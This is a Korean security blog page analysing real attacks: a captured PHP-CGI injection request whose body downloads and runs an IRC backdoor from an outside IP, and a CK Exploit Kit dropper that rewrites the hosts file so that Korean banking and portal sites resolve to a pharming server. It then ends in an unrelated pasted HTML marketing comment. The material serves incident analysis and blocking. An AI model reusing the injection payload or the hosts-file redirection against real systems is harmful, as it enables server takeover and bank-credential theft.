※ 아래 공개한 내용들은 학습과 사전차단을 통한 시스템 보호를 목적으로 하며, 부적절한 사용으로 인한 책임은 사용자 본인에게 있습니다.

또한 잘못된 내용이나, 추가 내용은 댓글을 통해 알려주시면 본문에 반영하도록 하겠습니다.


오늘은 매번 똑같은 공격패턴들만 보다가 나름 새로운 패턴을 보게됬습니다.

한 번의 공격에 여러 패턴을 이용하여 접근을 시도한 경우이고,

이런 경우 일부 보안 장비에서는 Multiple Signatures Attack로 탐지하기도 합니다.


우선 확인한 공격 당시의 HTTP 패킷 값입니다.


Post /cgi-bin/php4?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1

Host: ................

User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25

Content-Type: application/x-www-form-urlencoded

Content-Length: 187

Connection: close

<?php system("cd /tmp;lwp-download -a http://74.208.73.233/li.pdf;curl -O http://74.208.73.233/li.pdf;wget http://74.208.73.233/li.pdf; perl /tmp/li.pdf*;perl li.pdf;rm -rf /tmp/li.pdf*");=


cgi-bin취약점을 이용하여 보호기능 무력화를 시도하고 있으며, User-Agent를 봤을 때 아이패드를 사용하고 있다는 것을 추측할 수 있습니다.

물론 User-Agent야 얼마든지 수정 가능한 값이라고 하더라도요.

또 Post로 던진 Content값으로는 특정 서버에서 WebShell로 추정되는 pdf파일을 Bashshell Shock 취약점을 이용하여 다운로드 시도하고 있습니다.


Bashshell Shock 취약점을 이용하여 업로드 하려는 IP를 검색해보니 아래와 같습니다.



주소지는 미국에 있는 IP이고 해당 IP에 도메인이 걸려있습니다.

해당 도메인을 직접 접속하기엔 뭐가 있을지도 모르니 Malzilla라는 툴을 통해 접근해보겠습니다.



해당 도메인으로 접근시 검색했던 IP와 동일한 IP로 연결되는 것을 볼 수 있었고, 200 OK로 정상접근이 되지만, 빈 페이지인 것으로 보입니다.

아파치로 웹서버를 돌리고 있는 것을 볼 수 있는데 알려진 취약점이 있는 버전을 사용하고 있네요.


그리고 다음으로 역시 Malzilla를 통해 해당 서버에서 받아오는 li.pdf 파일을 살펴보겠습니다.


역시 파일 확장자만 pdf일 뿐이고 실제 내용은 Shell Script로 구성되어있습니다.

perl로 작성되어있고 이름마저 딱 써있네요. LinuxNet perlbot..

요즘 종종 보이는 bot인데 찾아보니 BLUECOAT에서 작년 9월에 Bashshell Shock 취약점을 이용하여 IRC Backdoor가 돌아다닌다고 적어뒀네요.

거기에 LinuxNet perlbot이 포함되어 있는걸 보니 공개된지는 얼마 안된건가 싶습니다.


virustotal에 해당 파일을 올려보니 이미 많은 백신에서 Backdoor, Shellbot으로 탐지를 하고 있었습니다



처음으로 파일이 업로드된게 2월 17일 00시경이었고 제가 탐지했던게 03시경이었으니 돌기 시작한지는 얼마 안된것 같습니다.

리눅스용이다보니 행위분석 등의 자세한 정보까지는 제공이 안 되네요.

대강 코드를 보면 IRC 서버와 클라이언트 설정을 하고 있으며, BLUECOAT에 적힌대로 IRC를 이용한 Backdoor인듯합니다.


모쪼록, 서버 관리자분들은 탐지장비가 있다면, Bashshell Shock에 해당하는 Signature 등록과 차단장비에 해당 파일을 다운로드 해오는 74.208.73.233 IP는 차단 설정을 하는 것이 좋겠습니다.


=========================================

<추가내용>

처음 해당 샘플을 접한건 2월 17일 03시 경이었으며, 추가로 확보한 샘플은 동일 서버(74.208.73.233)에서 md.org라는 파일명으로 배포되고 있습니다.



이 파일은 처음의 li.pdf파일과는 일부 설정값이 다르며, 이미 virustotal에 다양한 파일명으로 업로드가 된 것을 확인할 수 있습니다.



이 중 idex파일은 li.pdf파일을 배포하던 서버와 동일한 서버에도 존재하는 것으로 파악되었고, 따라서 현재 파악된 74.208.73.233 서버에 존재하는 IRC Backdoor로는 li.pdf, md.org, idex 파일입니다. 

이 외에도 더 있을 수 있으나 동일 서버에서 다수의 악성파일이 유포되고 있는 상황이므로, 차단 장비를 통해 해당 IP를 차단하는 것이 바람직해보입니다.



[Analysis] - CK 익스플로잇 킷 분석(CK Exploit Kit Analysis) -1


이전 글에 이어서 이번에는 분석환경에서 동적 분석 과정을 적어봤습니다.


3. 동적 분석

환경은 Windows7 초기 순정버전에 업데이트 패치도 없는 기본 버전입니다.

분석은 Sysinternals Suite의 Process Explorer, Procmon, TCPView입니다.

Process Explorer는 현재 실행중인 프로세스의 정보를 볼 수 있고,

Procmon은 과거 따로 존재하던 Filemon과 Netmon, Regmon을 하나로 통합시켰고,

파일과 레지스트리의 생성, 수정, 삭제, 네트워크 연결 정보 등을 볼 수 있습니다.

(Sysinternals : https://technet.microsoft.com/en-us/sysinternals/bb545021.aspx)


우선 간단히 Process Explorer에서의 모습입니다.

  3-1. dll.exe 실행 전


  3-2. dll.exe 실행 후


보시다시피 rundll32.exe가 추가된 것을 볼 수 있습니다.

하지만 속성 정보를 보면 다른 파일을 참조하고 있다는 것을 볼 수 있습니다.



Command line 항목에서 zzEki.dll을 참조하고 있습니다.

해당 경로에 역시 파일 생성이 된 것을 볼 수 있구요.


다음으로 TCPView를 통해 정보를 보도록 하겠습니다.


파일을 실행 직후 101.71.8.138로 연결을 시도하는 것을 볼 수 있습니다.



해당 IP주소는 중국으로 되어있구요.

대부분의 중국발 공격이 Unicom이라는 ISP업체와 항저우에 위치하던데, 작업장이라도 있는건가 싶네요.

그리고 domain을 localhost로 잡고 있는 것을 볼 수 있습니다.



실제로 ipconfig을 통해 DNS 정보를 본 결과 127.0.0.1과 8.8.8.8의 localhost와 Google의 DNS 서버로 변경되어있었습니다.

이것만 보더라도 파밍공격을 위해 DNS를 Localhost로 변경했고, hosts 파일을 이용하려고 한다는 것을 알 수 있습니다.


hosts 파일에 적힌 내용은 DNS서버에 쿼리보다 더 우선순위가 높기때문에 hosts 파일에 적힌 도메인들은 DNS 서버를 거치지 않게 됩니다.

그리고 공격자가 hosts파일에 지정한 것들 외에는 구글의 DNS 서버를 거치게하여 사용자는 정상적인 인터넷 서비스를 사용 중이라고 느끼게 됩니다.


지금까지 어떤 파일이 실행되고, 생기고, 정보가 변경되고...등의 사항들은 Procmon에서 수집을 하게됩니다.

하지만 악성코드들 외에도 기본적으로 윈도우에서 동작하는 작업들도 있기 때문에 이벤트양은 1초당 수 만줄이 넘을 때가 대부분입니다.

따라서 필터링 기능을 잘 이용하는게 핵심이라고 볼 수 있습니다.


저는 필터에서 dll.exe 실행시간 이후부터 5초 정도를 필터링해서 File -> Save -> .CSV 파일로 저장하여 엑셀에서 분석했습니다.

5초 정도를 필터링 걸고 보니 15000여 개의 이벤트가 쌓였네요.


15000줄이 넘는 이벤트에 대해 일일이 분석은 할 수 없으니 전체적인 흐름을 보도록하겠습니다.

우선 파일 실행 직후 101.71.8.138로 TCP 연결을 합니다.

이후 PC에 대한 스캔을 시작합니다.

디렉토리들에 대한 정보와 사융자에 대한 정보, 인터넷 사용 정보 등...

그리고 DNS 서버의 레지스트리 설정을 바꾸고, hosts 파일에 접근해서 다음 내용들을 추가합니다.

174.139.200.165    www.shinhan.com

174.139.200.165    search.daum.net

174.139.200.165    search.naver.com

174.139.200.165    www.kbstar.ccm

174.139.200.165    www.knbank.vo.kr

174.139.200.165    openbank.cu.vo.kr

174.139.200.165    www.busanbank.vo.kr

174.139.200.165    bamking.nonghyup.ccm

174.139.200.165    www.shinhan.ccm

174.139.200.165    www.wooribank.ccm

174.139.200.165    www.hanabank.ccm

174.139.200.165    www.epostbank.bo.kr

174.139.200.165    www.ibk.vo.kr

174.139.200.165    www.ibk.vo.kr

174.139.200.165    www.keb.vo.kr

174.139.200.165    www.kfcc.co.kr.ir

174.139.200.165    www.lottirich.co.ir

174.139.200.165    www.nlotto.co.ir

174.139.200.165    www.gmarket.net

174.139.200.165    nate.com

174.139.200.165    www.nate.com

174.139.200.165    daum.com

174.139.200.165    www.daum.net

174.139.200.165    daum.net

174.139.200.165    www.zum.com

174.139.200.165    zum.com

174.139.200.165    naver.com

174.139.200.165    www.nonghyup.com

174.139.200.165    www.naver.com

174.139.200.165    

174.139.200.165    www.nate.net

174.139.200.165    hanmail.net

174.139.200.165    www.hanmail.net

174.139.200.165    www.hanacbs.com

174.139.200.165    www.kfcc.co.kr

174.139.200.165    www.kfcc.vo.kr

174.139.200.165    www.daum.net

174.139.200.165    daum.net

174.139.200.165    www.kbstir.com

174.139.200.165    www.nonghuyp.com

174.139.200.165    www.shinhon.com

174.139.200.165    www.wooribank.com

174.139.200.165    www.ibk.co.kr

174.139.200.165    www.epostbenk.go.kr

174.139.200.165    www.keb.co.kr

174.139.200.165    www.citibank.co.kr

174.139.200.165    www.citibank.vo.kr

174.139.200.165    www.standardchartered.co.kr

174.139.200.165    www.standardchartered.vo.kr

174.139.200.165    www.suhyup-bank.ccm

174.139.200.165    www.suhyup-bank.com

174.139.200.165    www.kjbank.ccm

174.139.200.165    www.kjbank.com

174.139.200.165    openbank.cu.vo.kr

174.139.200.165    openbank.cu.co.kr

174.139.200.165    www.knbank.vo.kr

174.139.200.165    www.knbank.co.kr

174.139.200.165    www.busanbank.vo.kr

174.139.200.165    www.busanbank.co.ir

174.139.200.165    www.suhyup-bank.com

174.139.200.165    www.suhyup-bank.ccm

174.139.200.165    www.standardchartered.co.kr


국내 대부분의 유명 은행사들과 포털사이트 접근 시 이제 174.139.200.165라는 미국IP 쪽으로 접근을 하게 됩니다.

하지만 현재 저 IP는 접근이 안되고 있으며, 악성코드가 감염된 PC라면 은행이나 네이버에 접속 시 페이지를 찾을 수 없다는 메시지가 보입니다.


해당 파밍 사이트들이 살아있었다면, 어떤 식으로 정보를 가져가는지도 볼 수 있었을텐데 조금 아쉽게 됬네요.

이렇게 쭉 분석을 했는데 사실 이런 내용들은 virustotal에 악성코드만 업로드 하더라도 다 알 수 있는 정보가 됬습니다.

초기의 virustotal은 백신 엔진 탐지밖에 없었는데 말이죠..


더 많은 정보가 궁금하신 분들은 https://www.virustotal.com에서 dll.exe의 sha256 값인

8b0621cb875236a02d12cd2566e3eccdbec7af8c7c565a2524b5911e516d0ec2 를 검색해보세요.

혹은 여기를 클릭해서 바로 정보를 보실 수도 있습니다.


12일에 처음 dll.exe를 등록 당시 55개 엔진 중 31개가 탐지였는데 주로 Packer로 탐지됬었습니다.

현재 13일 오후 2시쯤에는 35개로 4개의 엔진에서 악성코드로 추가되었구요.




결국 이번 분석 내용들은 virustotal에서 모두 볼 수 있다는걸 느끼며..ㅠ

분석은 마무리 하도록 하겠습니다.







CK Exploit Kit, 일명 CK VIP Exploit Kit가 나온지는 꽤 시간이 흘렀고 이미 분석이 충분히 끝났다고 보여집니다.

하지만 제가 실제로 발생하는 공격에 CK Exploit Kit을 이용하는 것은 처음 접해봤기 때문에 오랜만에 분석을 해봤습니다.


1. 패킷 수집

해당 공격이 들어온 것은 침입탐지 장비를 통해서였으며, 

탐지 패턴은 '/*NB VIP*/'으로 일반적인 CK Exploit Kit가 가지는 패턴 중 하나입니다.

이 외에도 '/*jsnb vip*/', 'ck'라는 문자열이 발견 됩니다. 

침입탐지 장비의 특성상 모든 패킷을 수집하는 것이 아닌, 

탐지된 패턴으로부터 일정량만 수집하므로 중간이 잘린 형식의 패킷을 수집할 수 있었습니다.


  1-1. 첫번째 패킷


  1-2. 두번째 패킷



2. 패킷 분석

중간 내용이 잘린 패킷이므로 분석이라고 할 것 까지는 없으나, 

위 패킷은 내부의 사용자가 외부의 침해당한 홈페이지 접근 시 발생한 패킷입니다.

분석환경에서 동일한 홈페이지의 모든 링크를 클릭하다시피 하면서 패킷을 수집하였으나, 

해당 내용의 패킷은 수집할 수 없었습니다.


초기분석 당시는 몰랐으나 관련 기사를 통해 이전에 CK Exploit Kit이 한창 배포될 당시

특정 조건을 만족하면 랜덤하게 URL 리다이렉트를 한다는 사실을 알았습니다.

정말 조건이 안 맞아서였는지, 해당 코드가 있는 페이지를 못 찾은건지는 모르겠습니다.

(관련 기사 : http://dailysecu.com/news_view.php?article_id=6536)


패킷의 중간 내용이 잘려 있으므로, 난독화를 풀어서 실제 코드를 볼 수는 없었으나, 

코드의 마지막 부분에서 악성코드의 배포 URL로 추정되는 숫자 배열을 찾았습니다.



악성코드 배포지의 URL로 추정했던 이유는 

  (1) 악성코드는 탐지 회피를 위해 문자열을 아스키코드로 숫자화

  (2) 코드 중 악성코드 배포를 위한 URL이 존재할 것으로 추측

  (3) URL의 구조 중 'http://www'에서 'tt'와 '//','www'와 같이 반복되는 문자열들은 숫자코드도 동일하게 반복됨.

      위 코드에서는 275, 275가 tt에 해당하며, 206, 206이 //, www는 278, 278, 278로 표현되고있음.


이와 같은 이유로 URL로 추정하였고, 영어 T와 W는 아스키코드로 3차이가 나므로 275와 278은 T와 W로 확신했습니다.

275가 T 또는 t겠지만 다른 특수문자들도 표현되어야하므로 소문자라고 생각하고 275에서 소문자 t의 아스키 값인 116을 빼봤습니다.

159가 나오며 해당 숫자코드들에서 -159를 한 뒤 아스키 코드에 대입해보면 악성코드 배포 URL이 나올 것으로 생각했습니다.


위 공격이 탐지되었을 당시에는 분석도구도 없고 Python을 설치할 수도 없는 상황이라 MS의 만능도구인 엑셀로 해결을 했습니다 =)

  (1) 엑셀 -> 데이터 -> 텍스트 나누기 -> 쉼표 체크 -> 코드 붙여넣기

  (2) =char(A1-159)와 같은 함수를 통해 숫자를 아스키 코드로 변환


※ 악성코드 배포처가 국내 업체의 URL이므로 모자이크 처리하였습니다.


예상처럼 dll.exe 파일을 다운로드 시도하는 것을 볼 수 있습니다.

현재도 계속 배포 중이며 해당 홈페이지 및 악성코드는 Kisa에 신고한 상태입니다.

virustotal에는 아직 등록되지 않은 악성코드였으며, 호스트 파일 변조를 통한 국내 유명 은행사들을 파밍사이트로 연결시키고 있었습니다.



원래는 파일의 동적 분석까지 하고 끝낼 생각이었으나..

호스트 파일 분석도 추가하고, 피싱사이트 분석도 하게 생겼습니다.

그래서 이후의 분석 내용들은 두번째 글로 넘기겠습니다.. =)





  1. 민이 2016.01.24 12:17 신고

    안녕하세요~~

    인사드립니당

  2. 성윤호 2018.05.24 23:22 신고

    <div align="center" style="box-sizing: inherit; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; color: rgb(47, 47, 47); font-family: Roboto, Nanum Gothic, dotum, 돋움, gulim, 굴림, arial; font-size: 12px; background-color: rgb(255, 255, 255);"><div align="center" style="box-sizing: inherit; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline;"><div class="row" style="box-sizing: inherit; border: 0px; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 13px; line-height: inherit; font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, &quot;Helvetica Neue&quot;, Arial, sans-serif; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap; color: rgb(85, 85, 85); text-align: start;"><div class="col-md-12" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: 943.5px; min-height: 1px; flex: 0 0 100%; max-width: 100%;"><img src="http://img.i-on.net/images/webmagazine/20180305_column_title.png" style="box-sizing: inherit; border: 0px none; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: middle; margin: 0px; padding: 0px; text-size-adjust: none; width: 913.5px;"><br style="box-sizing: inherit;"></div></div><div class="container" style="box-sizing: inherit; border: 0px; font-variant-numeric: inherit; font-variant-east-asian: inherit; font-stretch: inherit; font-size: 13px; line-height: inherit; font-family: -apple-system, BlinkMacSystemFont, &quot;Segoe UI&quot;, Roboto, &quot;Helvetica Neue&quot;, Arial, sans-serif; vertical-align: top; margin: 0px auto; padding: 0px 15px; text-size-adjust: none; width: 913.5px; max-width: 1140px; color: rgb(85, 85, 85); text-align: start;"><div class="row" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap;"><h3 style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: 500; font-stretch: inherit; font-size: 1.75rem; line-height: 1.1; font-family: inherit; vertical-align: top; margin: 10px 0px 0.5rem; padding: 0px; text-size-adjust: none; color: inherit;">트렌드의 변화, 데이터 관리의 방향성</h3></div><div class="row" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap;"><div class="col-12" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: 913.5px; min-height: 1px; flex: 0 0 100%; max-width: 100%;"><h4 style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: 500; font-stretch: inherit; font-size: 1.5rem; line-height: 1.1; font-family: inherit; vertical-align: top; margin: 10px 0px 0.5rem; padding: 0px; text-size-adjust: none; color: inherit;"><br style="box-sizing: inherit;"><br style="box-sizing: inherit;">시대의 변화에 맞추어 '데이터'에 집중하다.<br style="box-sizing: inherit;"></h4><br style="box-sizing: inherit;">정보화 시대라고 불리우는 현재는 수많은 기술과 이를 기반으로 하는 수많은 서비스들이 생기고 사라지는 반복을 겪고 있습니다.<br style="box-sizing: inherit;">여기서 수 많은 기관, 기업은 모두 각자의 고유한 비즈니스에 따른 영역을 구축하고 존속하지만 공통적으로 집중하는 근본적인 과제가 있습니다. 이는 '콘텐츠' 또는 '데이터'입니다. 여기서 '데이터'에 집중해보고자 합니다.<br style="box-sizing: inherit;">데이터는 21세기의 '제 2의 원유'로 불리우며, 모든 기관과 기업은 각자의 비즈니스에 해당되는 데이터를 좀 더 의미 있게 생산, 활용, 응용, 분석하기 위한 많은 노력이 지속되고 있습니다. 또한, 데이터 자체의 양적 증가, 복잡성 해결, 활용성 등의 공통된 과제를 가지고 있습니다.</div></div><div class="row" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap;"><div class="col-12" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: 913.5px; min-height: 1px; flex: 0 0 100%; max-width: 100%;"><h4 style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: 500; font-stretch: inherit; font-size: 1.5rem; line-height: 1.1; font-family: inherit; vertical-align: top; margin: 10px 0px 0.5rem; padding: 0px; text-size-adjust: none; color: inherit;"><br style="box-sizing: inherit;"><br style="box-sizing: inherit;">데이터를 연결하는 트렌드 기술<br style="box-sizing: inherit;"></h4><br style="box-sizing: inherit;">이러한 데이터가 화두인 시대에서 이미 여러 가지 데이터를 관리하고 활용하는 기술들이 생겨나고 있습니다.<br style="box-sizing: inherit;">빅데이터(Big Data), 연결 데이터 (LOD, Linked Open Data), 개방형 데이터 (Open Data)등 최근 이슈가 되고 있는 정보기술 용어들의 핵심은 모두 '데이터'입니다.<br style="box-sizing: inherit;"></div></div><div class="row" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap;"><div class="col-md-4" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: 304.484px; min-height: 1px; flex: 0 0 33.3333%; max-width: 33.3333%;"><img src="http://img.i-on.net/images/webmagazine/20180305_column_1-1.jpg" style="box-sizing: inherit; border: 0px none; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: middle; margin: 0px; padding: 0px; text-size-adjust: none; width: 274.484px;"><br style="box-sizing: inherit;"></div><div class="col-md-4" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: 304.484px; min-height: 1px; flex: 0 0 33.3333%; max-width: 33.3333%;"><img src="http://img.i-on.net/images/webmagazine/20180305_column_1-2.jpg" style="box-sizing: inherit; border: 0px none; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: middle; margin: 0px; padding: 0px; text-size-adjust: none; width: 274.484px;"><br style="box-sizing: inherit;"></div><div class="col-md-4" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: 304.484px; min-height: 1px; flex: 0 0 33.3333%; max-width: 33.3333%;"><img src="http://img.i-on.net/images/webmagazine/20180305_column_1-3.jpg" style="box-sizing: inherit; border: 0px none; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: middle; margin: 0px; padding: 0px; text-size-adjust: none; width: 274.484px;"><br style="box-sizing: inherit;"></div></div><div class="row justify-content-center" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap; justify-content: center !important;"><div class="col col-md-auto" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: auto; min-height: 1px; flex: 0 0 auto; max-width: none;">[그림1 빅데이터, 연결데이터, 개방형 데이터]</div></div><div class="row" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap;"><div class="col-12" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: 913.5px; min-height: 1px; flex: 0 0 100%; max-width: 100%;">이러한 기술들은 모두 데이터를 좀 더 의미 있게 만드는 것에 주안점이 있습니다. 또한, 사람의 이해와 활용을 전제한 문서를 기계 또한 사람처럼 이해하고 자동으로 처리할 수 있는 데이터로 구축하는 것을 공유, 활용을 위한 것에 그 기술의 첫걸음으로 삼고 있습니다.<br style="box-sizing: inherit;"><br style="box-sizing: inherit;">Tim Berners-Lee는 Five Star Open Data에서 별점을 이용해 데이터를 정형화 시키는 개방의 단계와 효과에 대해서 다음과 같이 설명하고 있습니다.<br style="box-sizing: inherit;"></div></div><div class="row" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap;"><div class="col-md-12" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: 913.5px; min-height: 1px; flex: 0 0 100%; max-width: 100%;"><img src="http://img.i-on.net/images/webmagazine/20180305_column_2-1.png" style="box-sizing: inherit; border: 0px none; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: middle; margin: 0px; padding: 0px; text-size-adjust: none; width: 883.5px;"><br style="box-sizing: inherit;"></div></div><div class="row justify-content-center" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap; justify-content: center !important;"><div class="col col-md-auto" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: auto; min-height: 1px; flex: 0 0 auto; max-width: none;">[그림2 Tim Berners-Lee, Five Star Open Data]</div></div><div class="row" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap;"><div class="col-12" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: 913.5px; min-height: 1px; flex: 0 0 100%; max-width: 100%;">1단계는 포맷을 고려하지 않은 데이터입니다. 표를 스캔해서 PDF나 HWP 파일로 올린 경우가 1단계 수준의 공공데이터입니다. 2단계는 표를 이미지가 아닌 구조화된 데이터로 제공하는 형태입니다. 엑셀 파일로 표를 제공하는 경우가 이에 해당한다. 3단계는 비독점 포맷을 사용한 데이터입니다. 엑셀 파일 대신 CSV 파일로 데이터를 공개한 경우 3단계 데이터라고 말할 수 있습니다. 4단계는 개체를 가리킬 수 있도록 URI를 제공하는 경우이며, 마지막 5단계는 다른 데이터끼리 연결할 수 있는 데이터를 말합니다.<br style="box-sizing: inherit;"><br style="box-sizing: inherit;">이렇게 콘텐츠를 데이터화하고 연결 가능한 형태로 만듦으로써 사람은 물론이고 기계간의 명확하고 자유로운 데이터 소통이 가능한 열린 소통방식의 가능성이 열렸다는 것을 의미합니다.<br style="box-sizing: inherit;"></div></div><div class="row" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; flex-wrap: wrap;"><div class="col-12" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px; padding: 0px 15px; text-size-adjust: none; position: relative; width: 913.5px; min-height: 1px; flex: 0 0 100%; max-width: 100%;"><h4 style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: 500; font-stretch: inherit; font-size: 1.5rem; line-height: 1.1; font-family: inherit; vertical-align: top; margin: 10px 0px 0.5rem; padding: 0px; text-size-adjust: none; color: inherit;"><br style="box-sizing: inherit;"><br style="box-sizing: inherit;">메타데이터를 활용한 아카이브 시스템<br style="box-sizing: inherit;"></h4><br style="box-sizing: inherit;">아이온커뮤니케이션즈에서 제작/판매되고 있는 모든 컨텐츠 관리 시스템은 메타데이터를 기반한 콘텐츠 제작/관리에 중점을 두고 있습니다.<br style="box-sizing: inherit;"><br style="box-sizing: inherit;">여러 가지 콘텐츠 관리 시스템이 있지만 그 중 비정형 데이터 관리에 그 목적이 있는 아카이빙 시스템은 여러 포맷, 유형의 비정형 데이터에서 의미 있는 메타데이터를 추출하여 관리하는데 초점이 맞추어져 있습니다.<br style="box-sizing: inherit;"><br style="box-sizing: inherit;">현재까지는 비정형 데이터가 가지는 고유한 데이터를 추출/관리하는 데에 초점이 맞추어져 있었다면 위와 같이 축적된 데이터를 의미 있게 포맷화하고 연결하고 공유함으로써 관리되고 있는 모든 콘텐츠가 의미 있는 '관계'를 가짐으로써 사용자가 의도한, 또는 새로운 형태로 재활용 될 수 있도록 관리체계를 가질 수 있습니다.<br style="box-sizing: inherit;"><br style="box-sizing: inherit;">하지만 모든 관리 시스템이 이러한 환경 구축을 자동으로 지원하는게 아닌 많은 비용과 시간을 투자하여야 합니다. 그럼에도 이런 기술들에 관심을 갖는 이유는 명확합니다. 이러한 노력들이 고유하게 기관 또는 기업이 가지는 컨텐츠의 품질과 서비스를 더 나은 방향으로 높여주기 때문입니다.</div></div><div class="row" style="box-sizing: inherit; border: 0px; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; vertical-align: top; margin: 0px -15px; padding: 10px 0px; text-size-adjust: none; display: flex; 